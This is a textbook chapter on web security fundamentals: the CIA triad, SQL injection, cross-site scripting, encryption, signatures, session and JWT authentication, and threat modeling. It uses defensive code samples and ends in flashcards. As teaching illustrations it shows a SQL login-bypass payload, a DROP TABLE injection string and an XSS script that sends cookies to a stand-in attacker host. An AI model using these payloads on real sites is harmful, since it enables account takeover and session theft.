Security is not a feature; it is a property of the entire system, and one that is far easier to lose than to retrofit. Two recent industry numbers make the case concrete: cyberattacks against organizations grew sharply year over year in 2024, and the average cost of a single data breach now sits around \$4.4 million per incident (IBM’s annual Cost of a Data Breach report). A breach is rarely just an embarrassing news cycle — it is also legal exposure, regulatory fines, customer churn, mandatory remediation, and, sometimes, the end of the company.
The discipline that keeps these failures out is security engineering. This chapter introduces the smallest set of ideas a software engineer needs to reason about whether an application is secure and what kind of failure it is when it isn’t: the CIA triad, the two most common web vulnerabilities (SQL injection and cross-site scripting), the cryptographic primitives every web app eventually leans on, authentication mechanisms, and a handful of design principles that shape secure systems regardless of language or framework. We close with a four-question template — the security plan — for evaluating any system you build or inherit.
Two Stories That Frame the Chapter
Hollywood Presbyterian Medical Center, 2016. A ransomware infection encrypted the hospital’s files, taking the medical-records system offline. Staff resorted to fax machines and paper charts; some patients had to be diverted to other hospitals. The attackers demanded a ransom in Bitcoin; the hospital ultimately paid 40 BTC (about \$17,000 at the time) to restore access. No data was stolen. The harm was that legitimate users — doctors, nurses, the hospital itself — could no longer reach their own data and could no longer trust the data they did reach.
Equifax, 2017. Attackers exploited an unpatched vulnerability in Apache Struts (CVE-2017-5638) and exfiltrated the personal records of approximately 147 million Americans, including names, addresses, dates of birth, Social Security numbers, and driver’s license numbers. The total cost — settlements, regulatory fines, mandatory security upgrades — eventually exceeded \$1.38 billion. Nothing was deleted or encrypted. The harm was that highly sensitive data, which should never have left Equifax, was in the hands of strangers.
These two failures look superficially similar — both are “security incidents” — but they break the system in different ways, and a useful theory has to distinguish them. That theory is the CIA triad.
The CIA Triad: Three Security Attributes
Almost every security failure can be classified as a violation of one (or more) of three properties. Together they are known as the CIA triad.
Confidentiality
Sensitive data must be accessible to authorized users only.
A confidentiality failure is the system letting the wrong person read data they should not have seen. Equifax is the textbook case: the data itself was unchanged and still available — it had simply been read by people who had no business reading it. Other examples are leaked password databases, unencrypted health records on a stolen laptop, or a misconfigured cloud bucket that anyone on the internet can list.
Integrity
Sensitive data must be modifiable by authorized users only, and the system must keep it accurate, consistent, and trustworthy over its lifecycle.
An integrity failure is the system allowing the wrong change to be made. The Hollywood Presbyterian ransomware was an integrity failure as well as an availability one: the files on disk had been overwritten with attacker-controlled ciphertext. A more subtle integrity failure is a bank ledger where a row’s amount is silently mutated by an unauthorized SQL statement, or an audit log into which an attacker can write fake entries to cover their tracks.
Availability
Critical services must be available when needed by their legitimate clients.
An availability failure is the system being unable to serve requests that should succeed. Ransomware is one cause; a denial-of-service attack that floods the front door is another; a single power supply that takes the only data center offline is a third. The hospital was the textbook case here too — patient records existed, but doctors couldn’t get to them.
Why a Triad and not a Single Property
Different attacks violate different combinations of the three. Calling everything just “a security incident” obscures what went wrong and therefore what defense would have prevented it. Encryption protects confidentiality; cryptographic hashes and signatures protect integrity; redundancy and rate-limiting protect availability. You cannot pick the right defense without first identifying which property is at stake.
| Incident | Confidentiality | Integrity | Availability |
| --- | --- | --- | --- |
| Equifax 2017 (data exfiltration) | ✓ violated | — | — |
| Hollywood Presbyterian 2016 (ransomware) | — | ✓ (files overwritten) | ✓ (records inaccessible) |
| DDoS attack flooding a checkout API | — | — | ✓ |
| Stolen unencrypted laptop with PHI | ✓ | — | — |
| Forged transaction inserted into a bank ledger | — | ✓ | — |
Quick Check. Cover the table above. For each scenario, which CIA letter(s) apply, and why? Spaced retrieval — recalling without looking — is what builds durable memory; re-reading merely feels like it does.
Common Web Vulnerabilities
Two vulnerabilities account for an outsized share of real-world web breaches: SQL injection and cross-site scripting. Both have the same underlying shape — user-supplied data is mistakenly treated as code by some downstream interpreter — and both are eradicated by the same conceptual fix: separate code from data.
SQL Injection (SQLi)
A login handler that builds its query by string concatenation looks innocent:
```
name = get_user_input("username")
pass = get_user_input("userpassword")
sql  = ('SELECT * FROM Users '
        'WHERE Name = "' + name + '" '
        'AND Pass = "' + pass + '"')
user = db.execute_query(sql)
login(user) if user else retry()
```
For a normal login (name = "Tobias", pass = "password1234"), the database sees:

```
SELECT * FROM Users WHERE Name = "Tobias" AND Pass = "password1234"
```

— and returns the matching user (if any). But the user controls the contents of name and pass, and through string concatenation that means the user partially controls the query itself. An attacker submits the username Tobias and the password " or ""=", so the database sees:

```
SELECT * FROM Users WHERE Name = "Tobias" AND Pass = "" or ""=""
```

""="" is unconditionally true, so the WHERE clause is satisfied no matter what the real password is — and the attacker is logged in as Tobias without ever knowing it. With more sophisticated payloads the attacker can read other tables, modify or delete data, and (under some configurations) execute commands on the database server.
Why SQL Injection Matters
SQL injection has been described in print for almost three decades — the first public write-up appeared in Phrack magazine in 1998 — and it remains one of the most common web vulnerabilities found in the wild. The OWASP Top 10 has listed injection (a category dominated by SQLi) among the top web application security risks in every revision since 2003, ranking it #1 in the 2010, 2013, and 2017 editions, and it was still in the top 3 in 2021. A non-exhaustive timeline:
1998 — SQL injection is first described publicly (Phrack #54, Rain Forest Puppy).
2003–2017 — Injection appears in every revision of the OWASP Top 10, ranked as the #1 web-application security risk in the 2010, 2013, and 2017 editions.
2011 — A breach of Sony’s PlayStation Network, widely attributed to SQL injection, compromises personal data of ~77 million accounts.
2023 — The MOVEit Transfer breach (CVE-2023-34362) — a SQLi vulnerability in a widely used file-transfer product — is exploited by the Cl0p ransomware group, affecting thousands of organizations and tens of millions of individuals.
If a vulnerability has been understood since 1998 and is still on every “top web vulnerabilities” list a quarter-century later, the explanation is not that the fix is hard — it is that the fix is not the default. Every team that hand-rolls a query is one tired afternoon away from concatenating user input into a SQL string.
The Fix: Prepared Statements / Parameterized Queries
Almost every modern database driver supports parameterized queries: the developer writes the query with placeholders, and the parameter values are sent separately, never inlined into the SQL text:
```
name = get_user_input("username")
pass = get_user_input("userpassword")
sql  = ('SELECT * FROM Users '
        'WHERE Name = @0 '
        'AND Pass = @1')
user = db.execute_query(sql, name, pass)
login(user) if user else retry()
```
The placeholder syntax varies by driver (? in SQLite/MySQL, %s in psycopg, @0 / @1 in some Microsoft drivers, $1 / $2 in PostgreSQL’s native protocol), but the guarantee is the same: the database parses the SQL once, with the placeholders in place, and then binds the parameter values into the already-parsed query plan. The attacker’s " or ""=" payload now ends up as a literal string compared against Pass, never as additional SQL syntax.
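As a concrete illustration, here is a minimal sketch using Python’s built-in sqlite3 driver; the table and column names mirror the pseudocode above, and the find_user helper is illustrative rather than part of any framework:

```python
import sqlite3

def find_user(conn: sqlite3.Connection, name: str, password: str):
    # The "?" placeholders are part of the SQL that the driver sends for parsing;
    # the user-supplied values travel separately and are bound as pure data.
    cur = conn.execute(
        'SELECT * FROM Users WHERE Name = ? AND Pass = ?',
        (name, password),
    )
    return cur.fetchone()  # None if no row matches

# Even a hostile input is just a literal string compared against the Pass column:
# find_user(conn, 'Tobias', '" or ""="')  ->  None (no user has that literal password)
```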
Don’t roll your own escaping. A common (wrong) instinct is to “fix” SQLi by manually escaping quotes — replacing " with \", stripping semicolons, and so on. This loses to subtleties of every database’s quoting rules and is one Unicode normalization trick away from being bypassed. The correct fix is to never construct SQL by string concatenation in the first place — let the database do parameter binding.
Which CIA Properties Does SQLi Threaten?
Attribute
How SQLi can violate it
Confidentiality
Read sensitive data from any table the database role can see (SELECT * FROM Users and beyond).
Integrity
Modify, insert, or delete data (UPDATE Users SET role='admin' WHERE id=..., DROP TABLE, planted backdoor accounts).
Availability
Less common, but possible: dropping tables, deleting rows, or running expensive queries to exhaust the database.
The XKCD strip “Bobby Tables” — Robert'); DROP TABLE Students;-- — captures both the integrity and availability failure mode in one panel. The '); closes the original INSERT statement, DROP TABLE Students; removes the entire student table, and -- comments out whatever the original query had after the value, so the database doesn’t choke on a trailing syntax error.
Cross-Site Scripting (XSS)
Suppose a social-media site renders user comments into the page like this (pseudo-HTML):
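```html
<!-- Illustrative pseudo-HTML (reconstructed, not the site's actual markup):
     everything after "says:" is the user's comment text, inserted verbatim. -->
<div class="comment">
  <b>tobias</b> says: Great post, thanks for sharing!
</div>
```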
If the site renders the comment body by concatenating it into the HTML document, an attacker can post a comment whose body is:
<script>alert("USC IS BETTER!!!")</script>
When any other user’s browser fetches the page, that <script> tag is part of the document, so the browser executes it — believing it came from the trusted site. The alert box is harmless theatre; the real danger is that the script can read the victim’s cookies, session tokens, or DOM, and ship them off to an attacker-controlled server:
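```html
<!-- Illustrative payload; the attacker-controlled domain is hypothetical. -->
<script>
  fetch("https://attacker.example/steal?c=" + encodeURIComponent(document.cookie));
</script>
```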
Because the script runs in the trusted site’s origin, the same-origin policy is no defense — to the browser, this script is no different from one the site itself shipped. The attacker has effectively borrowed the site’s identity inside every visiting user’s browser.
Two High-Profile XSS Incidents
2010 — Twitter’s onmouseover worm. Twitter’s tweet-rendering pipeline failed to escape an onmouseover= attribute. A self-replicating tweet caused users’ browsers to retweet the payload as soon as the user’s pointer passed over it. The worm propagated to hundreds of thousands of accounts in a few hours and was used both for pranks (rainbow text, pop-ups) and for redirecting users to malicious third-party sites.
2018 — British Airways breach. Attackers (associated with the Magecart group) injected a small JavaScript skimmer into the BA website. When customers entered their payment details, the script silently exfiltrated names, addresses, card numbers, and CVVs to an attacker-controlled domain. Hundreds of thousands of customers were affected; the UK Information Commissioner’s Office subsequently fined BA £20 million.
Which CIA Properties Does XSS Threaten?
Attribute
How XSS can violate it
Confidentiality
Read cookies, tokens, DOM contents, or anything the user can see in the browser, and exfiltrate them.
Integrity
Modify the rendered page, submit forms in the user’s name, post on their behalf, change settings.
Availability
Less common, but a runaway script can wedge or crash the user’s browser tab.
The Fix: Sanitize / Escape and Use a CSP
Defenses come in layers:
Output encoding (the primary fix). Wherever user input is rendered into HTML, escape the metacharacters (< → &lt;, > → &gt;, " → &quot;, & → &amp;) so the browser sees them as text rather than as tag boundaries. Modern templating engines (React’s JSX, Vue’s {{ }} interpolation, Django templates, Jinja2) escape by default — bypassing them via dangerouslySetInnerHTML, v-html, mark_safe, or |safe is where XSS bugs are reintroduced. (A small sketch of output encoding follows this list.)
Content Security Policy (a defense in depth). A Content-Security-Policy HTTP header tells the browser which sources of script it will execute — typically, only the site’s own origin and a small explicit allow-list. Even if attacker-supplied <script> slips through escaping, a strict CSP refuses to run it.
Use HttpOnly cookies for session tokens. A cookie with the HttpOnly flag is unreadable from JavaScript, so a successful XSS attack cannot directly steal the session token. (It can still abuse the session by issuing requests from the victim’s browser — see the authentication section below.)
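As a minimal sketch of output encoding, here is a hand-rolled rendering path using Python’s standard-library html.escape; the render_comment helper is illustrative — real templating engines do this for you by default:

```python
import html

def render_comment(author: str, body: str) -> str:
    # html.escape turns &, <, > and (with quote=True, the default) " into
    # &amp; &lt; &gt; &quot;, so the browser treats the comment as text, not markup.
    return f'<div class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</div>'

print(render_comment("mallory", '<script>alert("USC IS BETTER!!!")</script>'))
# -> <div class="comment"><b>mallory</b>: &lt;script&gt;alert(&quot;USC IS BETTER!!!&quot;)&lt;/script&gt;</div>
```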
Cryptography
Modern security depends on a small set of cryptographic primitives. You will rarely implement them yourself — the rule is don’t roll your own crypto — but you must understand what each one does and what it does not do, in order to use the libraries correctly.
Symmetric Encryption (e.g., AES)
In symmetric encryption, the same secret key is used to both encrypt and decrypt. Plaintext + key → ciphertext; ciphertext + key → plaintext. The most widely used algorithm today is AES (Advanced Encryption Standard), with 128-, 192-, or 256-bit keys.
Symmetric ciphers are fast and well-suited to bulk data — disk encryption, file encryption, the data channel of TLS sessions. Their fatal limitation is the key-distribution problem: the sender and receiver must somehow agree on the secret key without an attacker overhearing them. If they could already have a private channel for that, they would not need encryption.
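A minimal sketch of symmetric encryption with AES-256-GCM, assuming the third-party cryptography package is installed (GCM is an authenticated mode, so tampering with the ciphertext is detected at decryption):

```python
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)   # the shared secret both parties must somehow agree on
aesgcm = AESGCM(key)

nonce = os.urandom(12)                      # unique per message; never reuse with the same key
ciphertext = aesgcm.encrypt(nonce, b"attack at dawn", None)

# The receiver needs the same key (this is the key-distribution problem) plus the nonce.
assert aesgcm.decrypt(nonce, ciphertext, None) == b"attack at dawn"
```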
Public-Key (Asymmetric) Cryptography (e.g., RSA)
Public-key cryptography solves the key-distribution problem. A key generator produces a pair of mathematically linked keys from a large random number:
The public key is published — anyone may have it.
The private key is kept secret by the owner — and only by the owner.
A message encrypted with one key of the pair can only be decrypted by the other key of the pair. From this single asymmetry, two crucial protocols fall out: encryption to a recipient and digital signatures.
Encrypting a Message to Bob
To send Bob a private message, Alice encrypts it with Bob’s public key. Anyone can do that — the public key is, well, public. But only Bob’s private key can decrypt the resulting ciphertext, so only Bob can read the message. No prior shared secret is required.
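A sketch of the same exchange using the cryptography package’s RSA-OAEP; the key size and padding parameters shown are common defaults, not requirements from the chapter:

```python
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

# Bob generates the key pair once; the public half may be published anywhere.
bob_private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
bob_public_key = bob_private_key.public_key()

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# Alice encrypts with Bob's public key ...
ciphertext = bob_public_key.encrypt(b"meet me at noon", oaep)

# ... and only Bob's private key can recover the plaintext.
assert bob_private_key.decrypt(ciphertext, oaep) == b"meet me at noon"
```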
Digital Signatures
The reverse direction is just as useful. If Alice encrypts a document with her own private key, anyone can decrypt it (with her public key) — so the document is not secret. But because only Alice has her private key, the fact that the document decrypts cleanly with her public key proves she must have produced it. That proof is what a digital signature is.
In practice nobody encrypts the entire document — that would be slow and wasteful, since the goal is authenticity rather than secrecy. Instead, the signer:
Computes a cryptographic hash of the document (a short, fixed-length, collision-resistant fingerprint — SHA-256, for example).
Encrypts the hash with her private key. That encrypted hash is the signature.
Verification reverses the steps: anyone with the document, the signature, and the signer’s public key can decrypt the signature, recompute the hash from the document, and check that the two hashes match. If they do, the document has not been altered and it really came from the holder of the matching private key.
Why hash before signing? Public-key operations are roughly three orders of magnitude slower than hashing per byte, so signing a 1 MB document directly would be slow. Hashing first reduces every document to a 32-byte digest; the public-key operation then runs over those 32 bytes regardless of original document size. As a bonus, the hash’s collision-resistance means an attacker cannot forge a different document with the same signature.
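A corresponding sketch of hash-then-sign with RSA-PSS from the cryptography package; the library performs the SHA-256 hashing internally as part of sign and verify, so the digest step appears only as the algorithm argument:

```python
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

signer_private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
signer_public_key = signer_private_key.public_key()

document = b"Pay Alice $100"
pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                  salt_length=padding.PSS.MAX_LENGTH)

# Sign: hash the document with SHA-256, then apply the private-key operation to the digest.
signature = signer_private_key.sign(document, pss, hashes.SHA256())

# Verify: recompute the hash from the document and check it against the signature;
# raises cryptography.exceptions.InvalidSignature if either was altered.
signer_public_key.verify(signature, document, pss, hashes.SHA256())
```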
Authentication
Authentication is the act of proving to a server that a request comes from a particular identified user. It looks deceptively trivial — “the user logs in, then makes requests” — but the question of what proof the client attaches to each subsequent request is where the design choices live. The naive answer is wrong; the better answers come with their own trade-offs.
Naive Approach: Send the Password Every Request
Don’t do this.
The most direct design is for the client to attach the username and password to every request, and the server to verify them every time:
@startuml
participant Client
participant Server
Client -> Server : Username, Password
Server --> Client : OK
Client -> Server : Request, Username, Password
Server --> Client : Reply
Client -> Server : Request, Username, Password
Server --> Client : Reply
@enduml
This works, but it is bad on two counts:
Slow. The server must verify the password (a deliberately slow hash like bcrypt or Argon2) on every request — adding tens of milliseconds of CPU per call.
Insecure. The client must keep the cleartext password in memory for the lifetime of the session, raising the blast radius of any client-side compromise. Every request is also a fresh chance for the password to leak in a log file, a proxy header, or a debug trace.
We need a way to prove identity without re-sending the password every time.
Session-Based Authentication (Session Cookies)
The standard fix is to authenticate once with username and password, and then issue the client a short-lived session ID — a random, opaque string that the server remembers alongside which user it represents.
@startuml
participant Client
participant Server
Client -> Server : Username, Password
Server --> Client : Set-Cookie: SessionID
Client -> Server : Request + Cookie(SessionID)
Server --> Client : Reply
Client -> Server : Request + Cookie(SessionID)
Server --> Client : Reply
@enduml
The session ID is stored client-side in a cookie that the browser automatically attaches to every subsequent request to the same domain. On each request, the server looks up the session ID in its own session store, finds the associated user, and serves the request as that user.
Important cookie flags. Three attributes harden a session cookie significantly:
HttpOnly — the cookie is not readable from JavaScript. A successful XSS attack therefore cannot exfiltrate the raw session ID.
Secure — the cookie is only sent over HTTPS. It cannot be sniffed off plain-HTTP networks.
SameSite=Strict (or Lax) — the cookie is not attached to cross-site requests. This is the primary defense against cross-site request forgery (CSRF), where a malicious page tries to issue an authenticated request from the victim’s browser.
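Putting the pieces together, here is a minimal Flask-style sketch of session issuance and lookup; the route names, the in-memory dict store, and the verify_password helper are illustrative, and a real deployment would use a persistent session store:

```python
import secrets
from flask import Flask, request, make_response, abort

app = Flask(__name__)
sessions = {}  # session_id -> user_id; in-memory stand-in for a real session store

@app.post("/login")
def login():
    user_id = verify_password(request.form["username"], request.form["password"])  # hypothetical helper
    if user_id is None:
        abort(401)
    session_id = secrets.token_urlsafe(32)          # long, random, opaque
    sessions[session_id] = user_id
    resp = make_response("ok")
    resp.set_cookie("session_id", session_id,
                    httponly=True, secure=True, samesite="Strict")
    return resp

@app.get("/me")
def me():
    user_id = sessions.get(request.cookies.get("session_id", ""))
    if user_id is None:
        abort(401)
    return {"user_id": user_id}
```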
Trade-offs.
Fast. Looking up a session ID is much cheaper than re-verifying a password.
Stateful. The server must keep a session store (in memory, in Redis, in a DB), which is a moving part to operate and a complication when scaling out.
Somewhat secure. Sessions can be made short-lived and explicitly invalidated on logout.
Still vulnerable to session-riding via XSS. Even with HttpOnly, a script running on the trusted page can issue authenticated fetch requests through the browser — the browser will dutifully attach the cookie. HttpOnly prevents theft of the session ID, not use of the session.
Authentication via JSON Web Tokens (JWT)
A JSON Web Token (JWT) sidesteps the server-side session store. After successful login, the server hands the client a small encoded JSON document — typically containing { "sub": "<user-id>", "exp": <expiry timestamp>, ... } — and digitally signs it with the server’s private (or symmetric) signing key.
@startuml
participant Client
participant Server
Client -> Server : Username, Password
Server --> Client : JWT (signed)
Client -> Server : Request + JWT
Server --> Client : Reply
Client -> Server : Request + JWT
Server --> Client : Reply
@enduml
The client attaches the JWT to every subsequent request — typically in an Authorization: Bearer <jwt> header, or in a cookie. The server verifies the signature with its own key and trusts the claims inside without any database lookup. There is no server-side session store to consult — the JWT is the session, and the signature is what makes it forgery-proof.
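A minimal sketch with the PyJWT library, using the symmetric HS256 variant; the secret and the 15-minute expiry are illustrative values:

```python
import datetime
import jwt  # PyJWT

SECRET = "change-me"  # illustrative; in production, load a strong key from a secrets manager

def issue_token(user_id: str) -> str:
    claims = {
        "sub": user_id,
        "exp": datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(minutes=15),
    }
    return jwt.encode(claims, SECRET, algorithm="HS256")

def current_user(token: str) -> str:
    # Verifies the signature and the exp claim; raises jwt.InvalidTokenError on failure.
    claims = jwt.decode(token, SECRET, algorithms=["HS256"])
    return claims["sub"]
```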
Trade-offs.
Stateless on the server. No session store; horizontal scaling is easier.
Fast. Verifying a signature is typically faster than a database round-trip to a session table.
Hard to revoke before expiry. Because the server keeps no record of “valid” tokens, a stolen JWT remains usable until its exp time is reached. Standard mitigations are short expiries (15 minutes is common) plus a longer-lived refresh token that is tracked server-side.
Same XSS exposure as session cookies, plus more. If the JWT is stored in localStorage (a common, lazy choice) it is directly readable by any script in the page — XSS exfiltrates the token outright. Storing the JWT in an HttpOnly + SameSite=Strict cookie reduces this to roughly the session-cookie risk profile.
Picking Between the Two
The choice is rarely a slam dunk. As a starting point:
Server-rendered web app, single backend, moderate scale. Session cookies (with HttpOnly, Secure, SameSite=Strict). Boring, well-understood, easy to revoke.
Many distinct services share authentication, or you are building a public API consumed by mobile clients. JWTs (signed, short-lived, paired with refresh tokens) work well — they don’t require every service to talk to a shared session store.
Either way: put the credential behind HttpOnly cookies if at all possible, never embed it in URLs, and never rely on the user’s browser keeping localStorage confidential.
Security Design Principles
Beyond specific vulnerabilities and primitives, security engineering is shaped by a small set of principles that have held up across decades of practice. Three are especially load-bearing for application developers.
Zero Trust Principle
Users and devices should not be trusted by default. Any input may be malicious, so every input must be sanitized.
The traditional (“perimeter”) model assumed that anything inside the corporate network was trustworthy and only outside traffic needed scrutiny. That assumption fails against insider threats, compromised internal hosts, supply-chain attacks, and the simple fact that modern apps span multiple networks. Zero Trust flips it: every request, no matter where it originates, is authenticated and authorized; every input, no matter where it comes from, is treated as potentially hostile until validated.
For an application developer, the operational consequence is that the trust boundary — the line between “I have to defend against this” and “I can rely on this” — should be drawn very tightly. Inputs from end users, third-party APIs, file uploads, configuration files, and even other internal services should all be validated at the boundary they cross into your code.
Open Design (vs. Security Through Obscurity)
Attackers should not be able to break into a system simply by understanding how it works. Use robust, public security mechanisms.
Security through obscurity is the temptation to keep a system secure by hiding how it works — a hidden URL, a custom-rolled hash, an unpublished port. The metaphor in the lecture is hiding the house key in a flowerpot: as soon as someone notices the flowerpot, the entire defense collapses.
The opposing principle is Open Design: the security of the system must rest on something that stays secret even when the design is public — typically a key, a password, or a private credential. AES, RSA, and TLS are all openly published; their security depends on key secrecy, not algorithm secrecy. This openness is a feature — the global security community has reviewed, attacked, and stress-tested these designs for decades, and weaknesses have been found and fixed publicly.
Obscurity is not useless — it is just not a foundation. Hiding implementation details (which version of which framework you run, which port management endpoints listen on) is a reasonable complementary layer that makes known vulnerabilities slower to find. Use it on top of strong, openly designed mechanisms — never instead of them. The rule of thumb:
When proposing a new security approach or algorithm: insist on public scrutiny — expose the design to the security community.
When deploying an existing, scrutinized technology in a real product: add complementary obscurity on top — hide your version numbers and configuration to slow down opportunistic attackers.
Principle of Least Privilege
Every program and every privileged user of the system should operate using the least set of privileges necessary to complete the job.
Originally formulated by Saltzer and Schroeder in 1975, the Principle of Least Privilege (sometimes called Least Authority or Minimal Privilege) is a strategy for shrinking the blast radius of an inevitable compromise. If every component runs with full permissions, the first foothold an attacker gets is also the last one they need; if every component runs with only what it requires, the foothold is contained.
A concrete application is to split a monolithic app into separate components, each with just the permissions it needs:
@startuml
component ProductDisplay
component EmailNotification
component ImageUpload
component SystemBackup
note bottom of ProductDisplay
Read-only access to
Products table
end note
note bottom of EmailNotification
Send-only access to
email API; no DB access
end note
note bottom of ImageUpload
Write-only access to
/uploads bucket; no delete
end note
note bottom of SystemBackup
Read-only access to FS/DB;
write only to backup bucket
end note
@enduml
If an attacker compromises the product display service, they cannot send phishing email to the user base, cannot upload arbitrary files, and cannot exfiltrate the entire database — those capabilities live in other processes with other credentials. The attack still hurts, but it does not become a company-ending event.
Cloud IAM systems (AWS IAM, GCP IAM, Kubernetes RBAC) are designed around this principle: every service, container, or human user gets a role that grants the narrowest set of capabilities that lets the role do its job. The opposite anti-pattern — running every service as the database owner with full network egress — is one of the single most common findings in real security audits.
Building a Security Plan
Knowing individual attacks and defenses is necessary but not sufficient. To reason about a whole system, security engineers use a four-question template. Walk through these for any system you build or inherit.
| # | Question | What you produce |
| --- | --- | --- |
| 1 | Security model. What are you defending? | A list of the assets that matter — data, services, secrets, reputation. |
| 2 | Threat model. Who might be attacking, and what are they trying to achieve? | A description of plausible adversaries and their goals. |
| 3 | Attack surface. Which parts of the system are exposed to an attacker? | An inventory of the inputs, endpoints, ports, and side channels an attacker can reach. |
| 4 | Protection mechanisms. How do we prevent (or detect) compromise? | The concrete defenses — input validation, encryption, authentication, monitoring — and which threats they address. |
Building a Threat Model: Knowledge, Actions, Resources, Incentive
A threat model is not “attackers are bad and want bad things”. It is a structured description of what kind of attacker you are defending against. The lecture distinguishes four dimensions:
Knowledge. What does the attacker already know about the system? (Public docs only? Stolen source code? An insider with credentials?)
Actions. What can the attacker actually do? (Send web requests? Run code on a guest VM? Tap the network? Bribe an employee?)
Resources. How much time, money, and infrastructure can they spend? (A bored teenager? A criminal cartel? A nation-state intelligence service?)
Incentive. Why do they want to compromise the system? (Financial gain? Ideological? Espionage? Vandalism?)
Different threat models warrant different defenses. A consumer mobile app and a defense contractor’s internal collaboration tool may use the same primitives (TLS, authentication, encryption at rest), but the strength and layering of those primitives — and the response cost they justify — differ by orders of magnitude.
Why a Wrong Threat Model Hurts
A widely circulated photograph shows an emergency telephone whose buttons are blocked by an aluminum foil cover with cutouts for “9” and “1” — meant to enforce “only 9-1-1 can be dialed”. Two things are wrong with the design:
Wrong threat model. Any phone number that contains only the digits 9 and 1 (e.g. 911-1119) can still be dialed. The cover assumed attackers would only press one digit at a time.
Larger-than-expected attack surface. The foil itself can be pushed sideways or torn, exposing the buttons underneath.
The lesson generalizes: a defense that doesn’t match the actual threat model and doesn’t account for the real attack surface fails for both reasons. Always do the four-question pass on the system as deployed, not the system as drawn on the whiteboard.
Quick Check. Pick a real application you use daily. Walk through the four questions: what is it defending, who attacks it, what is exposed, what defenses are in place? Where are the weakest links?
Summary
The CIA triad classifies security goals into three properties: Confidentiality (only authorized users can read), Integrity (only authorized users can modify), and Availability (the system serves legitimate clients when needed). Every breach is a violation of one or more of these.
SQL injection (SQLi) treats user-supplied strings as SQL code by string-concatenating them into queries. The fix is prepared statements / parameterized queries, which let the database parse the SQL once and bind values separately. Don’t roll your own escaping.
Cross-site scripting (XSS) treats user-supplied strings as HTML/JavaScript by interpolating them into pages. The fix is output encoding in the templating layer, defended in depth by a strict Content Security Policy and HttpOnly cookies for session credentials.
Symmetric encryption (AES) uses one shared key — fast, but suffers from the key-distribution problem. Public-key cryptography (RSA) uses a public/private key pair, enabling private messaging and digital signatures without prior shared secrets. Digital signatures are produced by encrypting the hash of a document with the signer’s private key.
Authentication must avoid sending the password on every request. Session cookies delegate to a server-side store and need HttpOnly + Secure + SameSite. JWTs are signed, stateless tokens — easier to scale across services, harder to revoke, and dangerous if stored in localStorage (XSS readable).
Three security design principles dominate application code: Zero Trust (validate every input, regardless of source), Open Design (security rests on key secrecy, not algorithm secrecy — public scrutiny improves designs), and Principle of Least Privilege (every component holds only the permissions its job requires, shrinking the blast radius of any compromise).
A security plan answers four questions: what are you defending (security model), who is attacking and why (threat model), where is the system exposed (attack surface), and what mechanisms prevent compromise (protection mechanisms). A defense built without a matching threat model fails — the foil-and-emergency-phone is the canonical illustration.
Quiz
Security and Authentication Flashcards
Retrieval practice for the CIA triad, SQL injection, XSS, cryptography (symmetric, public-key, signatures), authentication (sessions, JWT), and security design principles.
Difficulty:Basic
What are the three security attributes named by the CIA triad, and what does each one mean in one sentence?
Confidentiality — sensitive data is accessible to authorized users only. Integrity — sensitive data can be modified by authorized users only, and stays accurate, consistent, and trustworthy over its lifecycle. Availability — critical services are reachable when legitimate clients need them.
Almost every security failure is a violation of one or more of these three. Calling everything ‘a security incident’ obscures what went wrong; CIA gives you the vocabulary to be specific.
Difficulty:Basic
A laptop containing unencrypted patient health records is stolen. Which CIA property is violated?
Confidentiality — sensitive data is now accessible to whoever holds the laptop, who is not an authorized user. Integrity and Availability are not affected on the original system.
Disk encryption (e.g., FileVault, BitLocker, LUKS) is the standard countermeasure: a stolen disk reveals only ciphertext that the attacker cannot decrypt without the key.
Difficulty:Intermediate
A ransomware attack encrypts the only copy of a database. Which CIA properties are violated?
Integrity — the on-disk bytes have been overwritten with attacker-controlled ciphertext, an unauthorized modification. Availability — the legitimate users can no longer read their data. (Pure ransomware does not violate Confidentiality; modern ‘double-extortion’ ransomware that also exfiltrates would add a confidentiality violation.)
The standard countermeasures are backups (restore from before the attack) and least-privilege filesystem permissions (so a single compromised process can’t rewrite everything).
Difficulty:Basic
What is SQL injection in one sentence, and what is its underlying cause?
SQL injection is an attack where user-supplied input is concatenated into a SQL query string and ends up being interpreted as SQL syntax instead of as a value. The underlying cause is mixing code and data — the database’s parser cannot tell which characters came from the developer’s query template and which came from the user.
Every web vulnerability whose name contains ‘injection’ (SQL injection, command injection, LDAP injection, NoSQL injection) shares this same root cause.
Difficulty:Intermediate
What is the standard fix for SQL injection, and why does it work?
Use parameterized queries / prepared statements: write the SQL with placeholders (?, @0, $1, …) and pass the values as separate arguments to the database driver. This works because the database parses the SQL once with the placeholders in place before the values are ever attached, so the values cannot grow new SQL syntax — they are bound into an already-parsed query plan as pure data.
Manual escaping is a fragile, error-prone alternative — it loses to subtleties of every database’s quoting rules and to Unicode normalization tricks. Don’t roll your own escaping.
Difficulty:Intermediate
Which CIA properties can a successful SQL injection attack violate?
All three: Confidentiality (read sensitive rows from any table the connection can see), Integrity (modify, insert, or delete data — UPDATE … SET role='admin', INSERT a backdoor account, DROP TABLE), and Availability (less common, but possible — drop tables, delete rows, or run very expensive queries to exhaust the database).
SQLi is one of the few vulnerabilities that can hit all three CIA properties at once, which is part of why it has stayed so high on the OWASP Top 10 for so long.
Difficulty:Basic
What is cross-site scripting (XSS), and what is the underlying cause?
XSS is an attack where user-supplied content is interpolated into an HTML page and ends up being interpreted by the browser as HTML/JavaScript. The underlying cause is the same as SQLi — mixing code and data — but the downstream interpreter is the browser, not the database. The injected script runs in the trusted site’s origin, so it can read cookies, the DOM, and issue authenticated requests.
SQLi: code-vs-data confusion in the database. XSS: code-vs-data confusion in the browser. Same underlying shape, different victim, different defenses.
Difficulty:Intermediate
What are the main defenses against XSS?
